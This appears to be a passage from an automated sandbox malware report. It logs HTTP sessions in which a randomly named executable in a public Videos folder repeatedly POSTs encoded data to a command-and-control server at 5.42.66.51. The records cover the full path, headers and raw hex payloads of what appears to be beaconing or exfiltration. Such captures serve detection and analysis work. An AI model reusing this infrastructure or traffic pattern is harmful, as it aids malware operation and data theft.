                                                                                                Oct 11, 2024 20:38:42.551562071 CEST2128OUTData Raw: 5c 5e 43 50 5f 5c 55 54 54 57 5b 54 52 5a 57 5d 58 54 58 5e 5b 5f 55 5e 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \^CP_\UTTW[TRZW]XTX^[_U^_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.%)$=+.V>P+%/!#%'833=8&#8"9.5X>!(9;"_$,P,3
                                                                                                Oct 11, 2024 20:38:42.847465992 CEST25INHTTP/1.1 100 Continue


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                57192.168.2.5500425.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:44.486063957 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:38:44.842129946 CEST2156OUTData Raw: 5c 5a 43 5a 5f 52 55 5c 54 57 5b 54 52 56 57 54 58 50 58 54 5b 54 55 56 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \ZCZ_RU\TW[TRVWTXPXT[TUV_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-$:+>*)/$?"Z65'Y8U?>^1U!85P->>1#9"_$,P,
                                                                                                Oct 11, 2024 20:38:45.172259092 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:45.302998066 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:45 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 3a 01 36 3f 01 5c 2a 1d 21 1c 2f 29 2d 57 24 31 2e 15 31 06 05 5c 21 14 1a 1f 2e 2e 09 56 26 39 33 5d 3e 2c 25 0a 33 11 27 1d 30 2b 2b 5d 0d 10 26 5f 27 33 0c 1c 29 38 38 56 3a 3d 2e 5b 27 3e 07 07 21 3e 3f 53 35 00 36 02 25 02 0a 18 25 03 2d 51 2b 24 0f 13 2c 3f 27 5f 26 3e 2f 55 0f 11 3b 0d 31 59 2b 00 21 04 24 0f 20 2f 06 5c 20 01 2a 58 23 0a 2f 5a 32 14 38 02 32 3c 08 58 3e 0a 23 1e 29 54 21 5c 26 5c 3e 0d 28 08 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 98:6?\*!/)-W$1.1\!..V&93]>,%3'0++]&_'3)88V:=.['>!>?S56%%-Q+$,?'_&>/U;1Y+!$ /\ *X#/Z282<X>#)T!\&\>("S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                58192.168.2.5500435.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:46.323996067 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:38:46.707222939 CEST2156OUTData Raw: 5c 5e 43 5a 5f 58 55 58 54 57 5b 54 52 57 57 50 58 54 58 58 5b 5f 55 5a 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \^CZ_XUXTW[TRWWPXTXX[_UZ_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-$=+")6#$65&#,3Y(+. ;)Q-1>W4\."_$,P,


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                59192.168.2.5500445.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:47.190479994 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:38:47.545495987 CEST2552OUTData Raw: 59 53 43 51 5f 5e 55 5a 54 57 5b 54 52 57 57 57 58 53 58 5a 5b 55 55 5e 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YSCQ_^UZTW[TRWWWXSXZ[UU^_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-%*0>-=%'$*6%08=(-P +5S.-5?!X9"_$,P,
                                                                                                Oct 11, 2024 20:38:48.053354979 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:48.191018105 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:47 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                60192.168.2.5500455.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:48.470120907 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:48.889848948 CEST2156OUTData Raw: 59 5c 46 58 5f 5f 55 54 54 57 5b 54 52 5d 57 55 58 57 58 5e 5b 5d 55 5e 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y\FX__UTTW[TR]WUXWX^[]U^_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-$ ]>;==&0?.X!'/#>8%Q7..=1Z="79"_$,P,/
                                                                                                Oct 11, 2024 20:38:49.095366955 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:49.227150917 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:49 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 59 23 3c 33 1b 29 20 31 55 38 5c 21 56 25 32 2e 5f 26 16 0a 07 35 04 3f 05 2d 2d 33 12 31 29 28 01 3e 02 08 52 33 3c 2b 1d 27 11 2b 5d 0d 10 26 5f 26 33 2d 02 29 28 05 0d 39 00 08 5a 27 3d 3a 5f 36 00 01 55 21 07 26 05 25 3c 3b 0b 26 13 21 55 29 24 0f 5d 2c 12 37 16 24 3e 2f 55 0f 11 38 56 31 3f 12 59 21 04 3f 55 20 3f 3f 06 21 2f 04 58 37 0d 01 59 26 04 2b 10 26 5a 2e 1d 28 23 06 0a 3d 0c 0f 59 26 14 21 57 28 18 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989Y#<3) 1U8\!V%2._&5?--31)(>R3<+'+]&_&3-)(9Z'=:_6U!&%<;&!U)$],7$>/U8V1?Y!?U ??!/X7Y&+&Z.(#=Y&!W("S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                61192.168.2.5500465.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:50.331645966 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:38:50.685612917 CEST2156OUTData Raw: 59 5f 46 5a 5f 52 55 58 54 57 5b 54 52 58 57 5d 58 51 58 59 5b 5a 55 5c 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y_FZ_RUXTW[TRXW]XQXY[ZU\_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-$)3?+==$$,%5+/U<[>;-4(W9>!Z=1/;"_$,P,;
                                                                                                Oct 11, 2024 20:38:51.032080889 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:51.161204100 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:50 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 5d 22 3c 33 59 29 0d 03 13 2c 14 31 1c 32 0c 25 04 26 16 33 5e 22 29 24 1f 3a 3e 20 09 31 29 3c 02 29 02 31 0b 30 3f 05 5e 33 11 2b 5d 0d 10 25 05 30 0d 25 02 3d 5e 2c 50 39 3d 32 5a 27 00 21 02 21 00 09 53 21 3e 3a 06 25 05 24 50 26 04 21 1f 3c 24 25 5d 3b 3c 33 5f 32 04 2f 55 0f 11 3b 0f 32 3c 28 5b 21 03 33 54 34 59 34 5c 23 3f 22 59 34 0a 2f 59 25 2a 0e 04 25 12 3a 12 2a 23 3f 54 3d 32 35 59 25 29 3d 50 2b 08 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989]"<3Y),12%&3^")$:> 1)<)10?^3+]%0%=^,P9=2Z'!!S!>:%$P&!<$%];<3_2/U;2<([!3T4Y4\#?"Y4/Y%*%:*#?T=25Y%)=P+"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                62192.168.2.5500475.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:52.227608919 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:38:52.576322079 CEST2156OUTData Raw: 59 59 46 5c 5f 5d 55 55 54 57 5b 54 52 58 57 50 58 54 58 58 5b 5a 55 5a 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YYF\_]UUTW[TRXWPXTXX[ZUZ_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.D0)*)7065%,#((=V7,>%[>1Z/;"_$,P,;


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                63192.168.2.5500485.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:52.790832043 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:38:53.138720036 CEST2552OUTData Raw: 59 5b 43 5e 5f 5e 50 5f 54 57 5b 54 52 5c 57 50 58 5e 58 5d 5b 5b 55 57 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y[C^_^P_TW[TR\WPX^X][[UW_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.A$X*;%>0?"\!5/.#7);%U4!Q9=^)W \-"_$,P,+
                                                                                                Oct 11, 2024 20:38:53.487677097 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:53.999788046 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:53 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0
                                                                                                Oct 11, 2024 20:38:53.999907970 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:53 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0
                                                                                                Oct 11, 2024 20:38:54.000293970 CEST225INHTTP/1.1 100 Continue
                                                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 31 20 4f 63 74 20 32 30 32 34 20 31 38 3a 33 38 3a 35 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 11 Oct 2024 18:38:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                64192.168.2.5500495.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:54.020570993 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:54.417082071 CEST2156OUTData Raw: 5c 58 43 5a 5f 5f 50 5d 54 57 5b 54 52 59 57 50 58 53 58 5c 5b 5d 55 5f 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \XCZ__P]TW[TRYWPXSX\[]U__[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-39Z=]&Q*$_'Y:Y68#>!#^.,-:=:+"_$,P,


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                65192.168.2.5500505.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:56.627305031 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:38:56.990961075 CEST2552OUTData Raw: 59 5a 43 5f 5a 59 50 59 54 57 5b 54 52 5d 57 5d 58 57 58 5d 5b 58 55 5a 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YZC_ZYPYTW[TR]W]XWX][XUZ_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.0*(?;&=&8^0<.6%;Z.#([*W V.=)?!\-;"_$,P,/
                                                                                                Oct 11, 2024 20:38:57.343290091 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:57.471149921 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:57 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                66192.168.2.5500515.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:57.838104010 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:58.185700893 CEST2156OUTData Raw: 5c 58 43 5a 5f 52 50 5d 54 57 5b 54 52 5b 57 50 58 57 58 59 5b 5e 55 59 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \XCZ_RP]TW[TR[WPXWXY[^UY_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-'(Y);&W>% X35C/,U8]*8%W#^6:1^>" -;"_$,P,7
                                                                                                Oct 11, 2024 20:38:58.541266918 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:58.672930956 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:58 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 3a 02 21 59 28 00 3d 0d 31 1c 38 3a 2d 56 25 54 26 58 32 01 3f 5d 35 14 12 1f 3a 00 2c 08 26 03 37 1f 3e 2f 25 0f 33 11 05 5a 33 11 2b 5d 0d 10 25 05 26 33 3a 5e 2a 3b 33 09 2e 2e 04 5b 24 10 3e 5a 23 3d 3f 55 23 2e 3d 5c 31 02 2b 0f 26 04 39 51 28 1d 21 5b 3b 12 37 1b 26 14 2f 55 0f 11 38 57 31 3f 20 59 36 2d 30 0a 37 3f 23 00 37 11 0f 00 20 1d 20 04 25 03 30 04 32 02 32 1d 2a 0d 02 0b 3d 32 21 1a 27 2a 25 54 3c 22 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 98:!Y(=18:-V%T&X2?]5:,&7>/%3Z3+]%&3:^*;3..[$>Z#=?U#.=\1+&9Q(![;7&/U8W1? Y6-07?#7 %022*=2!'*%T<""S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                67192.168.2.5500525.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:58.917371035 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:38:59.263747931 CEST2552OUTData Raw: 5c 59 43 5c 5a 5e 55 5a 54 57 5b 54 52 57 57 51 58 53 58 5f 5b 59 55 5c 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
